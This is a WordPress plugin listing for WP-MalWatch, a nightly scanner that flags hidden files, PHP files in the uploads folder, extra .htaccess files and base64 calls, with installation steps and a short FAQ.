WP-MalWatch – Plugin

Author: OrangeCast

WP-MalWatch is a WordPress security plugin scanner designed to help alert you when hackers have been at work inside your blog.

If a hackers infiltrate a blog,normall one of the first thing they do is to plant hidden files, and malicious .HTACCESS files in various directors.
WP-MalWatch performs a security scan of your WordPress installation nightly looking for evidence of foul play and if WP-MalWatch finds it, a dashboard widget will tell you were you should take a closer look. WP-MalWatch's detailed report also provides you a very easy interface for looking at the contents of these files right from within WordPress so you don't have to get into messy FTP clients and editors looking at potential problems.

WP-MalWatch is not a tool to protect your blog from attack it is a scanning plugin that allows a WP admin to identify the presence of files in a blog installation and provides a simple viewer for examining them.

The plugin author claims that this plugin has been tested a blog sites with over 2,000 active users online and it didn't impact the server performance

WP-MalWatch Features:

  • Automated nightly scans with the option to manually invoke.
  • Efficient detection of PHP files in your Uploads directory.
  • Efficient detection of multiple .HTACCESS files in your installation.
  • Detection of files based on configurable file patterns.
  • Detection of hidden files.
  • Detection of configurable keywords in theme files.
  • Detection of encode64 calls in key WordPress files
  • Configurations including turning modules on and off.
  • A easy to use viewer for any files detected during a scan.
  • Symbolic link friendly file scanning.
  • Dashboard widget for easy notification.
  • Efficient and high performance scanning.
  • A very well written, modularized plugin architecture for future expansion.


a) Upload the 'wp-malware folder' to the /wp-content/plugins/ directory
b) Activate the plugin through the 'Plugins' menu in WordPress

PHP4 IS NOT supported and will produce an activation error.

Sub-domain installations and "One Click" installations have been found to put a fully qualified file system path in the "Miscellaneous -> Store Uploads In This Folder setting". The default is "wp-content/uploads". WP-MalWatch WILL NOT activate if the uploads folder is not set to the default setting.

WP-MalWatch only runs once a night detect any strange behaviour in your WP blog.
How do I know if an .HTACCESS file found in a plugin directory is malicious?

View it in the detailed reports and look at it. If it implements a 301 redirect to a site that doesn't look right, you have a problem. If it does some basic interaction with the plugin's site, you are likely OK.

If you received an error saying that the plugin had a fatal exception expecting a T_STRING on line 12 . . then you are running PHP4 on your web server. You should upgrade your PHP version to PHP 5.